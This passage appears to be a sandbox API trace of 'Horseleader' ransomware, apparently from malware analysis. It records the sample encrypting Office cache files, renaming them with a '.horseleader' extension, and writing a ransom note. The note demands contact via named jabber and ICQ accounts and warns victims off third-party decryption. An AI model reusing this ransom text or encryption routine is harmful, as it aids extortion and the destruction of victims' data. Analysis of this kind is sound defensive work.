lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.238] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x261a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.238] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.267] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.267] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.267] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.267] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.268] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.268] CloseHandle (hObject=0x158) returned 1 [0212.268] GetProcessHeap () returned 0x780000 [0212.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.horseleader") returned 105 [0212.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.horseleader" (normalized: "c:\\msocache\\all 
users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.horseleader")) returned 1 [0212.269] GetProcessHeap () returned 0x780000 [0212.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.269] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccessMUI.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0212.269] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Windows") returned -1 [0212.269] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0212.269] StrStrIW (lpFirst="AccessMUI.xml", lpSrch=".horseleader") returned 0x0 [0212.269] lstrcmpW (lpString1="AccessMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0212.269] lstrcmpW (lpString1="AccessMUI.xml", lpString2="_uninstalling_.png") returned 1 [0212.269] lstrlenW (lpString=".testttjffg") returned 11 [0212.269] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml", lpSrch=".testttjffg") returned 0x0 [0212.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.270] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.270] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.271] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0212.271] StrStrW (lpFirst="AccessMUI.xml", lpSrch=".txt") returned 0x0 [0212.271] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1349) returned 1 [0212.271] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x545, lpOverlapped=0x0) returned 1 [0212.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffabb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x545, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x545, lpOverlapped=0x0) returned 1 [0212.276] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.276] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.276] CloseHandle (hObject=0x158) returned 1 [0212.277] 
GetProcessHeap () returned 0x780000 [0212.277] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.277] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.horseleader") returned 105 [0212.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.horseleader")) returned 1 [0212.278] GetProcessHeap () returned 0x780000 [0212.278] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.278] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0212.278] lstrcmpiW (lpString1="AccLR.cab", lpString2="Windows") returned -1 [0212.278] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0212.278] StrStrIW (lpFirst="AccLR.cab", lpSrch=".horseleader") returned 0x0 [0212.278] lstrcmpW (lpString1="AccLR.cab", lpString2="#Decrypt#.txt") returned 1 
[0212.278] lstrcmpW (lpString1="AccLR.cab", lpString2="_uninstalling_.png") returned 1 [0212.278] lstrlenW (lpString=".testttjffg") returned 11 [0212.278] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab", lpSrch=".testttjffg") returned 0x0 [0212.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.278] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.279] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0212.280] StrStrW (lpFirst="AccLR.cab", lpSrch=".txt") returned 0x0 [0212.280] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=28016276) returned 1 [0212.280] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.280] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.283] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.283] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd5974a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.283] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.288] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ab2e94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.289] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0212.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0212.300] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0212.300] CloseHandle (hObject=0x158) returned 1 [0212.692] GetProcessHeap () returned 0x780000 [0212.692] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0212.692] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.horseleader") returned 101 [0212.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.horseleader")) returned 1 [0212.693] GetProcessHeap () returned 0x780000 [0212.693] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0212.693] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0212.693] lstrcmpiW 
(lpString1="branding.xml", lpString2="Windows") returned -1 [0212.693] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0212.693] StrStrIW (lpFirst="branding.xml", lpSrch=".horseleader") returned 0x0 [0212.693] lstrcmpW (lpString1="branding.xml", lpString2="#Decrypt#.txt") returned 1 [0212.693] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0212.693] lstrlenW (lpString=".testttjffg") returned 11 [0212.693] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpSrch=".testttjffg") returned 0x0 [0212.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0212.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0212.693] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0212.695] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0212.695] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0212.695] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=596341) returned 1 [0212.695] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0212.695] ReadFile (in: hFile=0x158, 
lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0213.811] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0213.812] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0213.812] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0213.812] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.260] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.260] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.263] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0215.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.264] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0215.264] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0215.264] CloseHandle (hObject=0x158) returned 1 [0215.264] GetProcessHeap () returned 0x780000 [0215.264] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0215.264] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.horseleader") returned 104 [0215.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.horseleader")) returned 1 [0215.265] GetProcessHeap () returned 0x780000 [0215.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0215.266] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="branding.xml", cAlternateFileName="")) returned 0 [0215.266] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0215.266] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\#Decrypt#.txt") returned 93 [0215.266] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.266] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0215.266] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0215.268] lstrlenA (lpString="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") returned 1368 [0215.268] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0215.268] CloseHandle (hObject=0x21c) returned 1 [0215.268] GetProcessHeap () returned 0x780000 [0215.268] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0215.268] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0215.268] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Windows") returned -1 [0215.269] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0215.269] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".horseleader") returned 0x0 [0215.269] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="#Decrypt#.txt") returned 1 [0215.269] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0215.269] lstrlenW (lpString=".testttjffg") returned 11 [0215.269] StrStrW 